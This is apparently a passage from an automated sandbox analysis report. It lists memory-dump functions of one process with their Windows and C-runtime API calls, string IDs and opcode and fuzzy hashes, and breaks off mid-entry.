                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: 0
                                                              • API String ID: 3215553584-4108050209
                                                              • Opcode ID: c5fbf6cbf01be343a6e5b9647b6ef2f4414ee8b6868a977b6d285d6eabe8a5d9
                                                              • Instruction ID: 2c9cbc985bbd586c20645c51dd5ccf62cccd59b331d75490533211e4412de078
                                                              • Opcode Fuzzy Hash: c5fbf6cbf01be343a6e5b9647b6ef2f4414ee8b6868a977b6d285d6eabe8a5d9
                                                              • Instruction Fuzzy Hash: EF61E219A0E28366FA788A2950003BF1791AFC2748F741135DD89DB7DECE6DE8778742
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 00007FF6A00B497D
                                                                • Part of subcall function 00007FF6A00AE56C: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6A00AEF39,?,?,0000E94925CDEBB0,00007FF6A00A57A9,?,?,?,?,00007FF6A00B507E,?,?,00000000), ref: 00007FF6A00AE5C1
                                                                • Part of subcall function 00007FF6A00AE5E4: HeapFree.KERNEL32(?,?,00007FF6A00AD60F,00007FF6A00B7DC0,?,?,?,00007FF6A00B8143,?,?,0000E94925CDEBB0,00007FF6A00B8688,?,?,?,00007FF6A00B85BB), ref: 00007FF6A00AE5FA
                                                                • Part of subcall function 00007FF6A00AE5E4: GetLastError.KERNEL32(?,?,00007FF6A00AD60F,00007FF6A00B7DC0,?,?,?,00007FF6A00B8143,?,?,0000E94925CDEBB0,00007FF6A00B8688,?,?,?,00007FF6A00B85BB), ref: 00007FF6A00AE60C
                                                                • Part of subcall function 00007FF6A00BB76C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A00BB79A
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3806578645-0
                                                              • Opcode ID: a9687b8fbf3c2df3c9b983c42e648fea4563e90f3d103a70a6894d5b62e4d472
                                                              • Instruction ID: 2c3fafbe37382d782419df8a3ac2865e5b54206fb4afed809fff0bce80212ef8
                                                              • Opcode Fuzzy Hash: a9687b8fbf3c2df3c9b983c42e648fea4563e90f3d103a70a6894d5b62e4d472
                                                              • Instruction Fuzzy Hash: 2A41E821F0F64356FA309A66645177AA290BF87BC4F444135EE4DC778FEE3CEA208604
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: b58a01c3eaf95072861ef5bcb5425f0a8d156f049cdaa0e6965f9f5ebbbf4e57
                                                              • Instruction ID: f27d778f02e195f9a398683f3837719d3d91882a879b16a4be4811791120e690
                                                              • Opcode Fuzzy Hash: b58a01c3eaf95072861ef5bcb5425f0a8d156f049cdaa0e6965f9f5ebbbf4e57
                                                              • Instruction Fuzzy Hash: 1CB09224E07B03D2EA096B256C8622822A5BF88701FA8403AC40CC2324DE2C20B54720
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5553e3581ede3cd1b10b1cabc268ded416cfed56c3084098db9f77835179c864
                                                              • Instruction ID: 0c9ffa9f11b8b35c46e46932d87040c516f2b18745007bcb13f2e17d918c6665
                                                              • Opcode Fuzzy Hash: 5553e3581ede3cd1b10b1cabc268ded416cfed56c3084098db9f77835179c864
                                                              • Instruction Fuzzy Hash: 71422121D2EE4BADE2538B35A8115766734BF563C0F51833BE80EB6B59DF2CB4638610
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorLastNameTranslatetry_get_function$CodePageValid_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3827717455-0
                                                              • Opcode ID: 9208ab3a8c0750dcd223613ebaccc8e7d7835f1e4260380340b09507b72bd65c
                                                              • Instruction ID: 2a16af1d6bb4a0fa7292fa5feb5693ed39c3908154d86ef39a295a1709d96113
                                                              • Opcode Fuzzy Hash: 9208ab3a8c0750dcd223613ebaccc8e7d7835f1e4260380340b09507b72bd65c
                                                              • Instruction Fuzzy Hash: C1C1F826B0A683A5EB60DB61D410BBA27A0FB85788F524035EE8DD779DDF3CE560C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorLast$CurrentFeatureInfoLocalePresentProcessProcessortry_get_function
                                                              • String ID:
                                                              • API String ID: 959782435-0
                                                              • Opcode ID: 5203609aa4bad29ed3e77321071a6e29ab0ed9482c732223ee7966cf5500c27a
                                                              • Instruction ID: a219b5be7b16703de4d3a93f8550fec5e0d370e983f90b46f55527e2f88dcca2
                                                              • Opcode Fuzzy Hash: 5203609aa4bad29ed3e77321071a6e29ab0ed9482c732223ee7966cf5500c27a
                                                              • Instruction Fuzzy Hash: D5B1F472A1A647A2EB649F21D411ABA37A1FB91B88F404132DA49C37DEDF3CE561C740
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 485612231-0
                                                              • Opcode ID: 2e11037db0977f4f005a61b76b88ce4246510ff31c1dda84676166b2e04852ae
                                                              • Instruction ID: 6328da5eff57831d6a160c0bb96d037008a86f67abad19b94fd933c2cbd73b8d
                                                              • Opcode Fuzzy Hash: 2e11037db0977f4f005a61b76b88ce4246510ff31c1dda84676166b2e04852ae
                                                              • Instruction Fuzzy Hash: 8B41B222726A5692EF04CF2AD9241A977A1FB48FD4B599037EE0EC7B5CDE3CD1528300
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9bbf4866a357c91611f18bb3e57e28d24af8732f5dd86d7352e5581cc33c1978
                                                              • Instruction ID: 23f42588a65fb7be1de854b7debb605bc18b41d0bc1c278a63862cc44706a47a
                                                              • Opcode Fuzzy Hash: 9bbf4866a357c91611f18bb3e57e28d24af8732f5dd86d7352e5581cc33c1978
                                                              • Instruction Fuzzy Hash: 06F06871B292569FDBA48F2CA4426297BD0E748381F509039D58DC3B08DE3C90608F14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c98899bf0b4cc2eff70223c8b4096042381509e14587035cd5d17786f15a567
                                                              • Instruction ID: 3550e1e8eb3c14c46c0479e155cb832cb2bb3b7d6aff6e4161b52919c5b1f18d
                                                              • Opcode Fuzzy Hash: 2c98899bf0b4cc2eff70223c8b4096042381509e14587035cd5d17786f15a567
                                                              • Instruction Fuzzy Hash: 8DA0022191EC43F0E7249B20E86447023B0EB61340B518031D01DD327AEF3CE974C301
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B135B
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B137A
                                                                • Part of subcall function 00007FF6A00B0B08: GetProcAddress.KERNEL32(?,?,00000002,00007FF6A00B0FAA,?,?,0000E94925CDEBB0,00007FF6A00AEF26,?,?,0000E94925CDEBB0,00007FF6A00A57A9), ref: 00007FF6A00B0C60
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B1399
                                                                • Part of subcall function 00007FF6A00B0B08: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF6A00B0FAA,?,?,0000E94925CDEBB0,00007FF6A00AEF26,?,?,0000E94925CDEBB0,00007FF6A00A57A9), ref: 00007FF6A00B0BAB
                                                                • Part of subcall function 00007FF6A00B0B08: GetLastError.KERNEL32(?,?,00000002,00007FF6A00B0FAA,?,?,0000E94925CDEBB0,00007FF6A00AEF26,?,?,0000E94925CDEBB0,00007FF6A00A57A9), ref: 00007FF6A00B0BB9
                                                                • Part of subcall function 00007FF6A00B0B08: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF6A00B0FAA,?,?,0000E94925CDEBB0,00007FF6A00AEF26,?,?,0000E94925CDEBB0,00007FF6A00A57A9), ref: 00007FF6A00B0BFB
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B13B8
                                                                • Part of subcall function 00007FF6A00B0B08: FreeLibrary.KERNEL32(?,?,00000002,00007FF6A00B0FAA,?,?,0000E94925CDEBB0,00007FF6A00AEF26,?,?,0000E94925CDEBB0,00007FF6A00A57A9), ref: 00007FF6A00B0C34
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B13D7
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B13F6
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B1415
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B1434
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B1453
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B1472
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                              • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                              • API String ID: 3255926029-3252031757
                                                              • Opcode ID: ff26fa549664a9e6c3b543b250e110c73e0e93b052ee1395b2146854f55f0003
                                                              • Instruction ID: 1152fb62b10ad929a2df515b0fc054c6b430f40246b79dd48f967916e2abaaef
                                                              • Opcode Fuzzy Hash: ff26fa549664a9e6c3b543b250e110c73e0e93b052ee1395b2146854f55f0003
                                                              • Instruction Fuzzy Hash: 73314368D0AA4BB1EB48DB54E8515E52321AB45347FC0443BD04DC63AEDF7CB6AAC3A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                              • String ID: bad locale name$false$true
                                                              • API String ID: 4121308752-1062449267
                                                              • Opcode ID: 2acc47f3ee5460246e562f599ce1c871837090b8d66bb40a8f3797986fa1f7c3
                                                              • Instruction ID: ae8917e6333a87c23291abdaa1ae1c841e0533c27429c3eadd9252435aa4c4e1
                                                              • Opcode Fuzzy Hash: 2acc47f3ee5460246e562f599ce1c871837090b8d66bb40a8f3797986fa1f7c3
                                                              • Instruction Fuzzy Hash: A2616D62A0B743AAEB15DB70D4502BD33A0EF84788F140135EA4DA7B9ADF3CE565D340
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: std::_$Lockit$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                              • String ID: bad locale name$false$true
                                                              • API String ID: 3230409043-1062449267
                                                              • Opcode ID: 81bd60a1d7d5c08784e6758f3cc98d711b41acc909d01d1c7b7e009cefe83931
                                                              • Instruction ID: 80529a9c7eb5b363e6de5d84c50d0a83f2d87f08d1a949cfc6065fb0913d4852
                                                              • Opcode Fuzzy Hash: 81bd60a1d7d5c08784e6758f3cc98d711b41acc909d01d1c7b7e009cefe83931
                                                              • Instruction Fuzzy Hash: 72817F22A1AB82A6EB00DF30D4502AE77A0FF94788F545135EA8D97B5DDF38D5A1C740
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: BlockUnwind$CatchExecutionFrameHandler3::Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 910750162-393685449
                                                              • Opcode ID: 0ad3f7242adc77171fa2c3354329154454959fcab71533e3599a90e7dc3b62df
                                                              • Instruction ID: a8283bc64c01c76e651722fb6302c09f954ffd1cc4e9dc557a75a549184ddee6
                                                              • Opcode Fuzzy Hash: 0ad3f7242adc77171fa2c3354329154454959fcab71533e3599a90e7dc3b62df
                                                              • Instruction Fuzzy Hash: 0DD18032A097879AEB60DF65E4402AD77A0FB55798F240235EF4D97B99DF38E4A0C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: a72655217cf3ecb92df7e52be9117dae27c383bc9466b8c480e74d0a462121ca
                                                              • Instruction ID: 0969235c93bb7af9f49205787624ce675d4ac865e1c73dbc18eb0ed29b41229e
                                                              • Opcode Fuzzy Hash: a72655217cf3ecb92df7e52be9117dae27c383bc9466b8c480e74d0a462121ca
                                                              • Instruction Fuzzy Hash: 7BC1F562E0EA83A6E6219F15904027E77A0FB82B84F944131EA4DC779BCF7CE975C300
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                              • String ID: bad locale name
                                                              • API String ID: 1386471777-1405518554
                                                              • Opcode ID: 901312fe49ec335b73383531d66f1a1410a0777c902f06001bd849fedde32a84
                                                              • Instruction ID: a52eb53f1c54ff663e3a964861f0a741c41c742c6db548abbd9c70ce36036de6
                                                              • Opcode Fuzzy Hash: 901312fe49ec335b73383531d66f1a1410a0777c902f06001bd849fedde32a84
                                                              • Instruction Fuzzy Hash: 56515822F0AB82AAFB14DBB4D4502AC33B4AF94784F444135DE4DA7B5ADF38A576D300
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6A00A3816,?,?,?,00007FF6A00A3514,?,?,?,?,00007FF6A00A01C5), ref: 00007FF6A00A35EB
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6A00A3816,?,?,?,00007FF6A00A3514,?,?,?,?,00007FF6A00A01C5), ref: 00007FF6A00A35F9
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6A00A3816,?,?,?,00007FF6A00A3514,?,?,?,?,00007FF6A00A01C5), ref: 00007FF6A00A3623
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6A00A3816,?,?,?,00007FF6A00A3514,?,?,?,?,00007FF6A00A01C5), ref: 00007FF6A00A3669
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6A00A3816,?,?,?,00007FF6A00A3514,?,?,?,?,00007FF6A00A01C5), ref: 00007FF6A00A3675
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: e28092d2a8754abe07b1813ff99e43b1423cfe1f6ef30b3aecc7f243d8151441
                                                              • Instruction ID: 73b7d3948386f7163af7d80747bd7503c8062a674a81cb7cc47bef5593a478cc
                                                              • Opcode Fuzzy Hash: e28092d2a8754abe07b1813ff99e43b1423cfe1f6ef30b3aecc7f243d8151441
                                                              • Instruction Fuzzy Hash: B631C621B1BB83B5EE15DB16A8006752394BF48BA4F694935ED1DCB399EF3CE4708300
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: 3e7576745228368b001dc45455e94fee6e3588f672ca8818725641a55fdbca99
                                                              • Instruction ID: f2529dc241407da42b5eae25b0bd13d697fe38c0a9d381b62ff6d42f40c4fa0d
                                                              • Opcode Fuzzy Hash: 3e7576745228368b001dc45455e94fee6e3588f672ca8818725641a55fdbca99
                                                              • Instruction Fuzzy Hash: 81119321719A4392E7509B16F844339A3E0FB89FE4F044234EA5EC77AADF7CD9248740
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ByteCharMultiStringWide
                                                              • String ID:
                                                              • API String ID: 2829165498-0
                                                              • Opcode ID: 13b951786706347ed30c3256fc5abe21f286629fc1ae3e690c436aa204d97c7e
                                                              • Instruction ID: 722749d053458ad667a3c0945e480fc656d9fa131a96016400dfaa51b224ee93
                                                              • Opcode Fuzzy Hash: 13b951786706347ed30c3256fc5abe21f286629fc1ae3e690c436aa204d97c7e
                                                              • Instruction Fuzzy Hash: 2B81B53261AB4396EB208F55D440379ABA1FB44BE8F540236EA5D97BCDDF3CE4258700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                              • String ID:
                                                              • API String ID: 459529453-0
                                                              • Opcode ID: 7b156b3fef83c02c43ea01abf10932abe987a5502ca0c24b17b6cf8582936866
                                                              • Instruction ID: 0d470b6944cb95ea2ce10a8a4c8c69487a71a787ca48b50297b209462df2cafc
                                                              • Opcode Fuzzy Hash: 7b156b3fef83c02c43ea01abf10932abe987a5502ca0c24b17b6cf8582936866
                                                              • Instruction Fuzzy Hash: 9A916E22A0AA8292EB64DB15E550379B7A1FB85BC4F144136DE8E83BADCF3DD465C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                              • String ID:
                                                              • API String ID: 459529453-0
                                                              • Opcode ID: 0c36f5b904ff30f730729e610fd2b9db094d15b04bf3cfd018bd2d334eecd3c9
                                                              • Instruction ID: d0f7a4c494c4b6557cb82377388373cf36019d29752ac186536a8d88bf51795f
                                                              • Opcode Fuzzy Hash: 0c36f5b904ff30f730729e610fd2b9db094d15b04bf3cfd018bd2d334eecd3c9
                                                              • Instruction Fuzzy Hash: 6D817F22A0AB8696EB64DB15D15036E77A1FB85BC4F044136DE8E83BADCF3DD465C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              • Opcode ID: e6b696b838180aeeb5d8db99cb0af4799342763c727a0bae7f89fe0791471731
                                                              • Instruction ID: 6d4dbf1d0261dbf8a42f680a9ffe78b961e8ac929d4fd7c97ac735a7ffe6f2cc
